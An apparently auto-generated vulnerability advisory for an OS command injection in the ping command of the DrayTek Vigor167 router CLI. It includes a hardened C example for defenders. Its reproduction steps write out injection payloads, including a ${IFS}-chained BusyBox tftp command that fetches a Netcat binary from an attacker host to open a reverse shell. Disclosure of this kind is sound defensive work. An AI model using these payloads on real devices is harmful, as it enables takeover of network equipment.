CVE-2023-47254
Description
An OS command injection in the CLI interface on DrayTek Vigor167 version 5.2.2 allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- DrayTek/Vigor167
Patches
Vulnerability mechanics
Root cause
"Missing input validation in the CLI ping command allows injection of arbitrary OS commands via backticks or `$()` syntax."
Attack vector
An attacker first logs into the CLI (Telnet or SSH) using any account created in the web interface, including accounts whose group settings deny all access [ref_id=1]. Once authenticated, the attacker issues the `ping` command with injected OS commands using backticks (``) or `$()` syntax. For example, `exec ping \`pwd\`` causes the device to execute `pwd` and treat the output as a hostname [ref_id=1]. The attacker can chain BusyBox commands (using `${IFS}` to bypass space-character evaluation errors) to download a reverse-shell payload via TFTP and achieve full remote code execution [ref_id=1].
Affected code
The command-line interface (CLI) accessible via Telnet and SSH on the DrayTek Vigor167 (version 5.2.2) is vulnerable. The `ping` command does not sanitize user input, allowing injection of arbitrary OS commands through backticks or `$()` syntax [ref_id=1].
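As an added illustration that is not part of the advisory and not DrayTek's own firmware code (the Vigor167 CLI source is not public), the following C contrasts the pattern the advisory describes with a hardened replacement: the ping target is validated as an IPv4 dotted quad or RFC 1123 hostname and then passed to `execv()` as a fixed argument vector instead of being spliced into a shell command line. The `/bin/ping` path and the `-c 4` packet count are assumptions.

```c
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only a dotted-quad IPv4 address or an RFC 1123 hostname: labels of
 * [A-Za-z0-9-] with no leading or trailing '-', joined by '.'. Everything
 * else (backticks, "$(", "${IFS}", spaces, ';', '|') is rejected, so the
 * shell metacharacters the advisory describes never reach a command line.
 * Rejecting a leading '-' also stops the target being read as a ping option.
 * Returns 1 if valid, 0 otherwise. */
int ping_target_is_valid(const char *host) {
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    size_t label_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == '.') {
            if (label_len == 0 || host[i - 1] == '-') return 0;
            label_len = 0;
        } else if (isalnum(c) || c == '-') {
            if (label_len == 0 && c == '-') return 0;
            if (++label_len > 63) return 0;
        } else {
            return 0;
        }
    }
    return label_len != 0 && host[len - 1] != '-';
}

/* Vulnerable pattern (the behaviour the advisory describes): the target is
 * spliced into a shell command line, so `cmd` and $(cmd) are evaluated:
 *     snprintf(buf, sizeof buf, "ping -c 4 %s", host); system(buf);
 *
 * Hardened replacement: validate first, then execv() the ping binary with a
 * fixed argv, so no shell is involved. Path and count are assumptions.
 * Returns ping's exit status, -1 if the target was rejected or exec failed. */
int run_ping(const char *host) {
    if (!ping_target_is_valid(host)) return -1;
    char *const argv[] = { "ping", "-c", "4", (char *)host, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv("/bin/ping", argv);
        _exit(127);                 /* execv only returns on failure */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because the validator rejects the input before any process is started, a target containing backticks, `$(` or `${IFS}` is refused with `-1` rather than being interpreted.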
What the fix does
The advisory states the solution status was "Open" at the time of disclosure, with a solution date of 2023-11-16 [ref_id=1]. No patch diff is provided in the bundle. The manufacturer was notified on 2023-09-22 and a solution was reportedly made available on 2023-11-16, but the advisory does not describe the remediation content [ref_id=1].
Preconditions
- Auth: Attacker must have valid credentials for any account created in the web interface (including accounts with denied group permissions)
- Network: Attacker must have network access to the device's Telnet or SSH service
- Config: For a full reverse shell, the attacker must host a TFTP server reachable by the device and serve a statically compiled Netcat binary
Reproduction
1. Log into the Vigor167 CLI via Telnet or SSH using any web-interface account.
2. Execute `exec ping \`pwd\`` to confirm command injection (the output shows `ping: /tmp: Unknown host`).
3. To achieve a reverse shell, set up a TFTP server on an attacker machine (e.g., 192.168.100.5) hosting a statically compiled Netcat binary.
4. On the device, run: `exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\`` to download the payload.
5. Execute the downloaded Netcat binary to establish a reverse shell back to the attacker [ref_id=1].
Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References